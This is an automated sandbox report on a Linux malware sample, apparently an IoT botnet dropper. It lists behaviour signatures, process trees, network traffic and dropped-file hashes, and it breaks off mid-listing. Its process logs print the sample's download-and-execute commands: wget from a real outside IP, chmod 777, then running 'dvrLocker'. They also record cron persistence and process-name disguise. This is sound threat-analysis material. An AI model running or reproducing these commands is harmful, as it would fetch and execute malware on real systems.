Malware Analysis Report

2025-05-05 22:02

Sample ID 241127-c5tnhsspcy
Target 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
SHA256 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b
Tags
defense_evasion discovery execution persistence privilege_escalation
score
7/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral3
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral4
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
7/10

SHA256

6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b

Threat Level: Shows suspicious behavior

The file 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown was found to show suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalation

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Executes dropped EXE

Creates/modifies Cron job

Enumerates running processes

Changes its process name

Writes file to tmp directory

System Network Configuration Discovery

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-27 02:39

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-27 02:39

Reported

2024-11-27 02:42

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

13s

Max time network

131s

Command Line

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown N/A

Processes

/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/1012/exe]

/bin/ls

[ls -l /proc/1017/exe]

/bin/ls

[ls -l /proc/1041/exe]

/bin/ls

[ls -l /proc/1047/exe]

/bin/ls

[ls -l /proc/1061/exe]

/bin/ls

[ls -l /proc/1065/exe]

/bin/ls

[ls -l /proc/1067/exe]

/bin/ls

[ls -l /proc/1070/exe]

/bin/ls

[ls -l /proc/1077/exe]

/bin/ls

[ls -l /proc/108/exe]

/bin/ls

[ls -l /proc/1084/exe]

/bin/ls

[ls -l /proc/1088/exe]

/bin/ls

[ls -l /proc/1097/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/1112/exe]

/bin/ls

[ls -l /proc/1113/exe]

/bin/ls

[ls -l /proc/1121/exe]

/bin/ls

[ls -l /proc/1125/exe]

/bin/ls

[ls -l /proc/1129/exe]

/bin/ls

[ls -l /proc/1134/exe]

/bin/ls

[ls -l /proc/1138/exe]

/bin/ls

[ls -l /proc/1143/exe]

/bin/ls

[ls -l /proc/1146/exe]

/bin/ls

[ls -l /proc/1148/exe]

/bin/ls

[ls -l /proc/1151/exe]

/bin/ls

[ls -l /proc/1152/exe]

/bin/ls

[ls -l /proc/1154/exe]

/bin/ls

[ls -l /proc/116/exe]

/bin/ls

[ls -l /proc/1162/exe]

/bin/ls

[ls -l /proc/1165/exe]

/bin/ls

[ls -l /proc/1166/exe]

/bin/ls

[ls -l /proc/1168/exe]

/bin/ls

[ls -l /proc/1173/exe]

/bin/ls

[ls -l /proc/1178/exe]

/bin/ls

[ls -l /proc/1182/exe]

/bin/ls

[ls -l /proc/1184/exe]

/bin/ls

[ls -l /proc/1186/exe]

/bin/ls

[ls -l /proc/1188/exe]

/bin/ls

[ls -l /proc/1191/exe]

/bin/ls

[ls -l /proc/1194/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/1229/exe]

/bin/ls

[ls -l /proc/1239/exe]

/bin/ls

[ls -l /proc/1250/exe]

/bin/ls

[ls -l /proc/1252/exe]

/bin/ls

[ls -l /proc/1266/exe]

/bin/ls

[ls -l /proc/1285/exe]

/bin/ls

[ls -l /proc/1286/exe]

/bin/ls

[ls -l /proc/1293/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/130/exe]

/bin/ls

[ls -l /proc/1303/exe]

/bin/ls

[ls -l /proc/1308/exe]

/bin/ls

[ls -l /proc/1319/exe]

/bin/ls

[ls -l /proc/1331/exe]

/bin/ls

[ls -l /proc/1341/exe]

/bin/ls

[ls -l /proc/1348/exe]

/bin/ls

[ls -l /proc/1370/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/1469/exe]

/bin/ls

[ls -l /proc/1475/exe]

/bin/ls

[ls -l /proc/1476/exe]

/bin/ls

[ls -l /proc/1477/exe]

/bin/ls

[ls -l /proc/1478/exe]

/bin/ls

[ls -l /proc/1480/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/163/exe]

/bin/ls

[ls -l /proc/164/exe]

/bin/ls

[ls -l /proc/165/exe]

/bin/ls

[ls -l /proc/166/exe]

/bin/ls

[ls -l /proc/167/exe]

/bin/ls

[ls -l /proc/168/exe]

/bin/ls

[ls -l /proc/169/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/170/exe]

/bin/ls

[ls -l /proc/171/exe]

/bin/ls

[ls -l /proc/172/exe]

/bin/ls

[ls -l /proc/173/exe]

/bin/ls

[ls -l /proc/174/exe]

/bin/ls

[ls -l /proc/175/exe]

/bin/ls

[ls -l /proc/176/exe]

/bin/ls

[ls -l /proc/177/exe]

/bin/ls

[ls -l /proc/178/exe]

/bin/ls

[ls -l /proc/179/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/181/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/206/exe]

/bin/ls

[ls -l /proc/207/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/25/exe]

/bin/ls

[ls -l /proc/255/exe]

/bin/ls

[ls -l /proc/26/exe]

/bin/ls

[ls -l /proc/27/exe]

/bin/ls

[ls -l /proc/276/exe]

/bin/ls

[ls -l /proc/28/exe]

/bin/ls

[ls -l /proc/29/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/30/exe]

/bin/ls

[ls -l /proc/31/exe]

/bin/ls

[ls -l /proc/32/exe]

/bin/ls

[ls -l /proc/334/exe]

/bin/ls

[ls -l /proc/336/exe]

/bin/ls

[ls -l /proc/34/exe]

/bin/ls

[ls -l /proc/35/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/415/exe]

/bin/ls

[ls -l /proc/421/exe]

/bin/ls

[ls -l /proc/425/exe]

/bin/ls

[ls -l /proc/433/exe]

/bin/ls

[ls -l /proc/439/exe]

/bin/ls

[ls -l /proc/440/exe]

/bin/ls

[ls -l /proc/441/exe]

/bin/ls

[ls -l /proc/444/exe]

/bin/ls

[ls -l /proc/451/exe]

/bin/ls

[ls -l /proc/457/exe]

/bin/ls

[ls -l /proc/462/exe]

/bin/ls

[ls -l /proc/464/exe]

/bin/ls

[ls -l /proc/465/exe]

/bin/ls

[ls -l /proc/466/exe]

/bin/ls

[ls -l /proc/468/exe]

/bin/ls

[ls -l /proc/485/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/515/exe]

/bin/ls

[ls -l /proc/518/exe]

/bin/ls

[ls -l /proc/524/exe]

/bin/ls

[ls -l /proc/532/exe]

/bin/ls

[ls -l /proc/544/exe]

/bin/ls

[ls -l /proc/568/exe]

/bin/ls

[ls -l /proc/595/exe]

/bin/ls

[ls -l /proc/596/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/632/exe]

/bin/ls

[ls -l /proc/650/exe]

/bin/ls

[ls -l /proc/652/exe]

/bin/ls

[ls -l /proc/662/exe]

/bin/ls

[ls -l /proc/665/exe]

/bin/ls

[ls -l /proc/670/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/708/exe]

/bin/ls

[ls -l /proc/712/exe]

/bin/ls

[ls -l /proc/716/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/79/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/80/exe]

/bin/ls

[ls -l /proc/81/exe]

/bin/ls

[ls -l /proc/82/exe]

/bin/ls

[ls -l /proc/83/exe]

/bin/ls

[ls -l /proc/84/exe]

/bin/ls

[ls -l /proc/85/exe]

/bin/ls

[ls -l /proc/867/exe]

/bin/ls

[ls -l /proc/89/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/ls

[ls -l /proc/917/exe]

/bin/ls

[ls -l /proc/934/exe]

/bin/ls

[ls -l /proc/949/exe]

/bin/ls

[ls -l /proc/962/exe]

/bin/ls

[ls -l /proc/968/exe]

/bin/ls

[ls -l /proc/98/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
US 151.101.193.91:443 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
GB 195.181.164.17:443 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/tmp/lib/dvrLocker

MD5 559f129d380ad1cfb60792c6b2dc3d32
SHA1 3997a0fc0bd5958783f1751364ec407c5b170adc
SHA256 fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA512 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

/tmp/lib/dvrLocker

MD5 d09db60a70d5b53b5b53ad39476fd7e8
SHA1 73a75e5e8200f77d857a7256cc0979077e29241d
SHA256 36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512 ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04

/tmp/lib/dvrLocker

MD5 f812a7b3a877f717eb6e54b843b41848
SHA1 21ee67d9a9b638621646e1b57fdc0f1eb0bdfa25
SHA256 9a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560
SHA512 c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732

/tmp/lib/dvrLocker

MD5 c6f057c974b24f6abdac5b76b10040b9
SHA1 80295c6fdf8fff202829732e58428d656b38f6bd
SHA256 4e114c1111ecdaf0a7622a347c025cd3f9584be170b129113d836a2a5a7c169f
SHA512 23a3bda5842b7e4e0abb6601c5c692d88ebe70c9ebe292d58ee5731aa34647b277ba46b893bcc2481be510442170118e29294a604c6ec296a2712316d09261e6

/tmp/lib/dvrLocker

MD5 b1a1559b205459098f1fff627d35c808
SHA1 983f62052375084a8c125353e0c25b7cd19bd369
SHA256 e4837942ba2584de61bc3a75eba74f4eb0a137a7807130553c42d470c3ec01da
SHA512 3bb8ec38b6f3d17f7c7307785f609031b30056da380377bce27bdd48678cbbc81c4b7203ff511794ec6d23644952a82fa471e13149c014a91378f08305e6f60d

/mnt/dvrLocker

MD5 45c898246a8ffe0b7cc20fe25669da04
SHA1 5ae935186b80f6beb84926d57337d5c0b9e3e1fc
SHA256 1b0846e58fbb6a0e72d25edb81ec94961c0c7048a4e6f26876660f5a26675c77
SHA512 ca75fb8ae0aa7977132c2888ff226f712f4e66f542ab121bcffdc3b3a912b906870b55d6415dfc60c133574739a71c1e5177418dd275d208f43d6ffc09c14636

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-27 02:39

Reported

2024-11-27 02:42

Platform

debian9-armhf-20240729-en

Max time kernel

150s

Max time network

138s

Command Line

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 168.235.111.72 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.7ecNDm /usr/bin/crontab N/A

Enumerates running processes

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself [watchdog/0] /tmp/lib/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/868/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/832/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/844/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/860/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/853/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/823/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/846/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/850/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/819/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/820/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/835/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/867/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/848/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/855/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/856/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/866/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/830/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/837/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/839/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/852/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/862/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/875/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/mounts /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/864/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/876/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/826/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/829/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/2/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/840/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/788/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/854/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/871/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/872/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown N/A

Processes

/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/103/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/111/exe]

/bin/ls

[ls -l /proc/113/exe]

/bin/ls

[ls -l /proc/114/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

